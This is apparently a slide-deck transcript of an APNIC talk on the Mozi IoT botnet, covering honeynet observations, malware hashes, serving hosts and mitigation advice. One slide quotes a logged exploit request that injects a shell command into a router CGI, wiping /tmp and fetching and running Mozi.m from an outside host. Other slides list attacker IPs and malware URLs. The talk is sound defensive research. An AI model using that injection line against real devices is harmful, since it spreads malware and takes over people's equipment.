38th TWNIC OPM: Observations and mitigation of Mozi botnet

1. Observations and Mitigation of Mozi botnet Adli Wahid adli@apnic.net Senior Internet Security Specialist APNIC 1

2. Let’s Connect! • LinkedIn: Adli Wahid • Twitter/Instagram: @adliwahid • Email: adli@apnic.net 2 https://unsplash.com/@adliwahid

3. Discussion 1. Background 2. Mozi (IoT) Botnet 3. Observations 4. Vulnerabilities & Products 5. Mitigation & Remediation Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research & presentation 3

4. Background (Source of Data) • APNIC Community Honeynet Project oCollaboration with partners across AP • Honeypots & Honeynet oAnything that interact with the honeypots is suspect oConfirmed with observed actions + artifacts (payload, logs, etc) oDefinitely not ’spoofed’ traffic • Types of Honeypots oTelnet/SSH (Cowrie) ** relevant for this talk oOld vulnerabilities – i.e SMB (Dionaea) 4

5. What We Observe • Attacks that spread via oSSH & Telnet bruteforce oExploiting _known_ vulnerabilities • Nature of oMalware - cryptominers, ddos agents, etc oSource of attack == infected devices* • Left of the Hack oObservations on attacker’s infrastructure oBot recruitments oScripts, malware payload, traffic • Attacks that no one pays attention to J 5 DDoS Attack timeline Build/Buy Infrastructure • Write malware • Infect devices • Setup Command & Control “Left of the Hack” “The Hack”

6. Mozi Botnet • Discovered in September 2019 by Netlab • Significant outbreak in Sept 2020 (100k nodes) • Targets IoT devices (MIPs, ARM, PPC and x86) • Uses unique P2P Command & Control o BitTorrent Distributed Hash Table (DHT) as carrier protocol o Makes it robust & tricky* to track • Some capabilities (from config) o Perform a Ddos attack o Update executable from given URL o Execute command via shell or system() o DNS Spoofing o HTTP Session Hijacking (with JS) o Mining • Code base from other botnets o Gafgyt o Mirai • Propagation o 14 HTTP based exploits of via web interface of IoT Devices o Mainly Telnet**, FTP, SSH credentials brute-force 6

7. 7 Nmap scan report for host-x.static.kbtelecom.net (219.x.y.184) Host is up (0.062s latency). PORT STATE SERVICE VERSION 53387/tcp open elf-exe ELF 32-bit executable file This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR

8. 8 Infected Device Infected Device Server Hosting Payload Command & Control Infected Device Typical DDoS botnet (mirai, etc) Infected node – communicate with other node. No centralized infrastructure

9. Mozi Author ”taken custody” by LEA in 2021 https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ Is it still around? 9

10. 2022 - Still Active? durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900] "GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+- rf+/tmp/*; wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear; sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0 Check your webserver logs for Mozi.a or Mozi.m 10

11. Observations in APNIC Honeynet Project • In 05/2022, we observed an ELF binary “.i” in some URLs o Post-login downloads • Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i • IP in URL can be the same as attacking host or different Source IP (attacking/spreading) IP hosting binary:random_port o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766 o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134 o2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462 o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724 o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224 o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764 o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134 o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273 11 1. Telnet username:password 2. wget http://x.x.x.x:nnnn/.1

12. The “.i” & Finding Mozi o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped • SHA256 a04ac6d98ad989312783d4fe3456c53730 b212c79a426fb215708b6c6daa3de3 o Known to VirusTotal • Finding Mozi • Maybe we can find Mozi.m or Mozi.a on the webserver? o If .i in $IP:PORT o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config 12

13. Observations – (hash) fingerprints :~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m 9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i ~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i 479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m 6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i ~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i 23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m 289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i 13 Are they the same files?

14. Slowly increasing last 6 months Daily Hits 14 Snapshot on 29/11/2022

15. IP from TW – last 6 months [Snippet] 2022-11-29T00:41:00.077072,60.x.y.205,hxxp://60.x.y.205:61756/.i,TW,3462 2022-11-29T08:49:20.515523,59.x.y.10,hxxp://59.x.y.10:12819/.i,TW,3462 2022-11-29T09:01:48.079099,220.x.y.53,hxxp://220.x.y.53:29971/.i,TW,3462 2022-11-29T17:53:40.465965,49.x.y.24,hxxp://49.x.y.24:45704/.i,TW,18049 2022-11-30T15:48:10.382224,123.x.y.244,hxxp://171.x.y.95:39821/.i,TW,131596 15

16. Serving Malware 2022-08-30T11:07:19.374102,202.x.y.26(MN),hxxp://61.a.b.131:58871/.i (TW) 2022-10-18T12:34:38.452976,202.x.y.26(MN),hxxp://219.a.b.184:53387/.i (TW) 16 * Server hosting Mozi is not the attacking device ** Repeat offenders Source from MN IP serving Mozi binary

17. Mitigation & Remediation (not just Mozi) • To prevent o Spread o Impact (i.e. DDoS, Redirect , Mining) • The Usual Advice o Harden Device – Patch, Strong Credentials o But whose job is it anyways? • Proactive – Monitor, Respond & Share*** o Get Feeds on Infected Devices o Sources of Feeds – ShadowServer Foundation, DASH/APNIC Honeynet, Abuse.CH ThreatFox o Have a response plan • Threat awareness o Attackers build infrastructure before attacking o Don’t wait for an attack to happen 17

18. Thank You! Adli Wahid <adli@apnic.net> 18

19. Resources 1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/ 2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its- lingering-bots/ 3. Mozi Tools - https://kn0wledge.fr/projects/mozitools/ 4. https://www.microsoft.com/security/blog/2021/08/19/how-to- proactively-defend-against-mozi-iot-botnet/ 5. ShadowServer Foundation - https://www.shadowserver.org/what- we-do/network-reporting/get-reports/ 6. APNIC DASH – https://dash.apnic.net 7. APNIC Community Honeynet Project – adli@apnic.net 19

38th TWNIC OPM: Observations and mitigation of Mozi botnet

Du liest eine Vorschau.

Hier ansehen

38th TWNIC OPM: Observations and mitigation of Mozi botnet

Weitere Verwandte Inhalte

Ähnlich wie 38th TWNIC OPM: Observations and mitigation of Mozi botnet (20)

Weitere von APNIC (20)

Aktuellste (20)